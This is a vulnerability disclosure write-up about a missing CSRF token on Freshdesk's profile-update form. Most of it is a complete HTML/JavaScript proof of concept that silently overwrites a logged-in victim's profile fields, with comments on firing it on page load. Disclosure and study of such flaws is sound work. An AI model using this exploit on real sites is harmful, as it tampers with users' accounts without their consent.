I was able to find a few web-application security issues in the Freshdesk website. They had a responsible disclosure policy (http://freshdesk.com/security), so I was able to report them.
The profile-update form did not use CSRF tokens. An attacker could therefore host a page that submitted that form on behalf of any logged-in user who visited it, silently overwriting that user's account information (name, job title, phone, mobile, Twitter handle, time zone and language), because the browser attaches the victim's session cookie to the cross-site request and the server had nothing else to tell a forged submission from a genuine one.
<html>
  <body>
    <script>
      // CSRF proof of concept. A victim who is logged in to Freshdesk and opens this
      // page has their profile overwritten when the button is clicked (the click is
      // only for demonstration; an attack page would call submitRequest() on load).
      function submitRequest() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://exploit.freshdesk.com/support/profile", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        // multipart/form-data is a CORS-safelisted content type, so the browser sends
        // this cross-origin POST without a preflight; the response is not readable,
        // but for CSRF only the side effect matters.
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------273522544628602");
        // withCredentials makes the browser attach the victim's Freshdesk session cookie.
        xhr.withCredentials = true;
        // Hand-built multipart body: a Rails-style PUT override (_method=put), an empty
        // avatar file part, the profile fields to overwrite, and no CSRF token.
        var body = "-----------------------------273522544628602\r\n" +
          "Content-Disposition: form-data; name=\"_method\"\r\n" +
          "\r\n" +
          "put\r\n" +
          "-----------------------------273522544628602\r\n" +
          "Content-Disposition: form-data; name=\"user[avatar_attributes][content]\"; filename=\"\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------273522544628602\r\n" +
          "Content-Disposition: form-data; name=\"user[name]\"\r\n" +
          "\r\n" +
          "haxor\r\n" +
          "-----------------------------273522544628602\r\n" +
          "Content-Disposition: form-data; name=\"user[job_title]\"\r\n" +
          "\r\n" +
          "haxor\r\n" +
          "-----------------------------273522544628602\r\n" +
          "Content-Disposition: form-data; name=\"user[phone]\"\r\n" +
          "\r\n" +
          "12345678904\r\n" +
          "-----------------------------273522544628602\r\n" +
          "Content-Disposition: form-data; name=\"user[mobile]\"\r\n" +
          "\r\n" +
          "7894561233\r\n" +
          "-----------------------------273522544628602\r\n" +
          "Content-Disposition: form-data; name=\"user[twitter_id]\"\r\n" +
          "\r\n" +
          "@exfdsfdsf\r\n" +
          "-----------------------------273522544628602\r\n" +
          "Content-Disposition: form-data; name=\"user[time_zone]\"\r\n" +
          "\r\n" +
          "sesdsds\r\n" +
          "-----------------------------273522544628602\r\n" +
          "Content-Disposition: form-data; name=\"user[language]\"\r\n" +
          "\r\n" +
          "en\r\n" +
          "-----------------------------273522544628602\r\n" +
          "Content-Disposition: form-data; name=\"commit\"\r\n" +
          "\r\n" +
          "Save Changes\r\n" +
          "-----------------------------273522544628602--\r\n";
        // Send the body as raw bytes so the browser keeps the Content-Type and
        // boundary set above instead of generating its own.
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>